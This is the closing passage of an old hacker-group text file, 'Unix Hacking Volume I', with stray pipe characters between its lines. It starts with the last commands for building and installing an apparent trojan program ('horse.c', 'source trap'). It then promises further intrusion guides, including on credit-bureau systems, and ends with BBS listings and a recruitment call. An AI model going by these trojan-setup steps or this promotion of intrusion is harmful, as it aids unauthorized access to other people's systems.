cc horse.c -lcurses -ltermcap
|
|||
|
mv a.out horse
|
|||
|
source trap (again, don't type the %)
|
|||
|
|
|||
|
|
|||
|
|
|||
|
+---------------------+
|
|||
|
| IX. Closing Remarks |
|
|||
|
+---------------------+
|
|||
|
|
|||
|
|
|||
|
Well this is the end of Unix Hacking Volume I. You should have a firm
|
|||
|
awareness with UNIX now and I hope you continue to grow and wait for
|
|||
|
our UNIX Hacking Voulume II which will contains holes into the unix
|
|||
|
system..
|
|||
|
|
|||
|
NHA nor the Author(s) of this file are responisble for any use that
|
|||
|
may come into play by the reader. This is meant for education purposes
|
|||
|
only not for any illegal activities.
|
|||
|
|
|||
|
___ ___ ___ ___ ___________
|
|||
|
| \ | |\ | |\ | |\ | |\
|
|||
|
| \ | | | | | | | | | | ___ | |
|
|||
|
| \ | | | | |_|_| | | | |\ _| | |
|
|||
|
| \| | | | | | | |_|_| | |
|
|||
|
| |\ | | | ___ | | | ___ | |
|
|||
|
| | \ | | | |\ _| | | | |\ _| | |
|
|||
|
| | |\ | | | | | | | | | | | | | |
|
|||
|
| | | | | | | | | | | | | | | | | |
|
|||
|
|___| | |___| | |___| | |___| | |___| | |___| |
|
|||
|
\___\| \___\| \___\| \___\| \___\| \___\|
|
|||
|
|
|||
|
- A Production of the NetWork Hacker Alliance INC -
|
|||
|
|
|||
|
PreZidents:Inphiniti & Code of Honor & Cobra
|
|||
|
|
|||
|
NHA Member Boards Listing
|
|||
|
+=+=+=+=+=+=+=+=+=+=+=+=+
|
|||
|
+---------------------+---------------+-------------+---------+
|
|||
|
| Inphiniti's Edge | 216-662-5115 | NHA *WHQ* | NoT |
|
|||
|
| Project Phusion | 301-365-9249 | NHA Node 1 | NoT |
|
|||
|
| Realm of Chaos | 516-466-8259 | NHA Node 2 | Ex-NASTY|
|
|||
|
+---------------------+---------------+-------------+---------+
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NHA is now accepting applications.. If you are intrested
|
|||
|
and knowledgable in the Hacking of Networks and Phreaking
|
|||
|
etc, please call your fine H/p bbs system and download
|
|||
|
'NHA-APP.TXT' and upload it to Inphiniti's Edge.
|
|||
|
|
|||
|
With this file we welcome Keener into NHA.
|
|||
|
|
|||
|
|
|||
|
N.H.A. The Future of Hacking and Phreaking
|
|||
|
|
|||
|
|
|||
|
In the works....
|
|||
|
|
|||
|
CBI Advanced Usage
|
|||
|
TRW Advanced Usage
|
|||
|
Milton.Edu Advanced Usage
|
|||
|
|
|||
|
more to come from N.H.A.
|